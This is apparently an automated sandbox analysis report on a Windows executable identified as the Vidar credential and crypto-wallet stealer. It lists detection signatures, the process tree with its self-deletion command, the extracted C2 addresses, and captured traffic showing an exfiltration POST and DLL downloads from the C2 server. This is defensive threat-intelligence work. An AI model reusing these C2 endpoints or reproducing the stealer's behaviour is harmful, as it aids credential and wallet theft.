Edit tour

Windows Analysis Report
82xul16VKj.exe

Overview

General Information

Sample name:	82xul16VKj.exe renamed because original name is a hash value
Original sample name:	07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957.exe
Analysis ID:	1466531
MD5:	eb2f14b68aa11a4aea94985c87714811
SHA1:	2fa340debaa9fbe53ad934403d64a827ddde9445
SHA256:	07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957
Infos:

Detection

CryptOne, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected CryptOne packer

Yara detected Powershell download and execute

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for sample

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores large binary data to the registry

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Classification

Process Tree

System is w7x64

82xul16VKj.exe (PID: 2112 cmdline: "C:\Users\user\Desktop\82xul16VKj.exe" MD5: EB2F14B68AA11A4AEA94985C87714811)

kat2B07.tmp (PID: 204 cmdline: C:\Users\user\AppData\Local\Temp\kat2B07.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)

cmd.exe (PID: 640 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit MD5: AD7B9C14083B52BC532FBA5948342B98)

timeout.exe (PID: 1240 cmdline: timeout /t 10 MD5: 419A5EF8D76693048E4D6F79A5C875AE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199730044335", "https://t.me/bu77un"], "Botnet": "67fd81bf99f2a8aaa5bc79a1cfb25860"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: 82xul16VKj.exe PID: 2112	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 82xul16VKj.exe PID: 2112	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 82xul16VKj.exe PID: 2112	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: kat2B07.tmp PID: 204	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: kat2B07.tmp PID: 204	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.82xul16VKj.exe.3080000.4.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.82xul16VKj.exe.3080000.4.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.82xul16VKj.exe.2eb7719.3.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.82xul16VKj.exe.2eb7719.3.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.82xul16VKj.exe.2a0000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.82xul16VKj.exe.2a0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Sigma Signatures

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\kat2B07.tmp, ProcessId: 204, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 82xul16VKj.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199730044335	Avira URL Cloud: Label: malware
Source: https://t.me/bu77un	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199730044335", "https://t.me/bu77un"], "Botnet": "67fd81bf99f2a8aaa5bc79a1cfb25860"}

Multi AV Scanner detection for domain / URL

Source: survey-smiles.com	Virustotal: Detection: 8%	Perma Link
Source: http://survey-smiles.com/R	Virustotal: Detection: 12%	Perma Link
Source: http://survey-smiles.com/	Virustotal: Detection: 8%	Perma Link
Source: http://survey-smiles.com/z	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: 82xul16VKj.exe

Virustotal: Detection: 39%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.3% probability

Machine Learning detection for sample

Source: 82xul16VKj.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: I8S%
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: usernameField
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: a GX Stable
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: uctName
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: layVersion
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: sktop\
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: F783D5D3EF8C*
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: T=@?VDX;W:R1J )M$
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: #5EG P%:{
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: ystemInfo
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: 304FDQ8L\h$
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: %hu/%hu
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack	String decryptor: ero\wallet.k9ys

Source: 82xul16VKj.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49161 version: TLS 1.2

Source:

Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199730044335
Source: Malware configuration extractor	URLs: https://t.me/bu77un

Source: global traffic

TCP traffic: 192.168.2.22:49162 -> 116.202.180.70:5432

Source: global traffic

HTTP traffic detected: GET /bu77un HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 199.59.243.226 199.59.243.226
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: tea.arpdabl.orgContent-Length: 4761Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: survey-smiles.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.180.70

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JEVOW3XT.htm

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /bu77un HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: survey-smiles.comConnection: Keep-AliveCache-Control: no-cache

Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: tea.arpdabl.org
Source: global traffic	DNS traffic detected: DNS query: survey-smiles.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1Host: tea.arpdabl.orgContent-Length: 4761Connection: Keep-AliveCache-Control: no-cache

Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: kat2B07.tmp, 00000002.00000003.356734139.0000000000946000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.356820905.0000000000948000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.356654978.0000000000942000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.366603952.0000000000942000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.360869270.0000000000944000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/envx
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000000.341903981.00000000004B4000.00000002.00000001.01000000.00000004.sdmp, kat2B07.tmp.0.dr	String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://survey-smiles.com/R
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://survey-smiles.com/z
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://tea.arpdabl.org
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tea.arpdabl.org/)
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tea.arpdabl.org/v
Source: kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://tea.arpdabl.org5432Content-Disposition:
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://tea.arpdabl.orgHJK
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70/2
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70/I
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432
Source: kat2B07.tmp, 00000002.00000003.369794652.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.371917226.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/2r
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/freebl3.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/mozglue.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/msvcp140.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/nss3.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/softokn3.dll%
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/softokn3.dllP
Source: kat2B07.tmp, 00000002.00000003.371917226.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/sqlt.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432/vcruntime140.dll
Source: kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.180.70:5432Content-Disposition:
Source: BAEBGC.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BAEBGC.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BAEBGC.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BAEBGC.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BAEBGC.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BAEBGC.2.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: BAEBGC.2.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199730044335
Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/bu77un
Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/bu77unguf_hMozilla/5.0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: BAEBGC.2.dr	String found in binary or memory: https://www.google.com/favicon.ico
Source: BGDGHJ.2.dr	String found in binary or memory: https://www.google.com/search?q=net
Source: BGDGHJ.2.dr	String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: BGDGHJ.2.dr	String found in binary or memory: https://www.google.com/search?q=wmf
Source: kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425244038.000000000026F000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, BGDGHJ.2.dr	String found in binary or memory: https://www.google.com/sorry/index
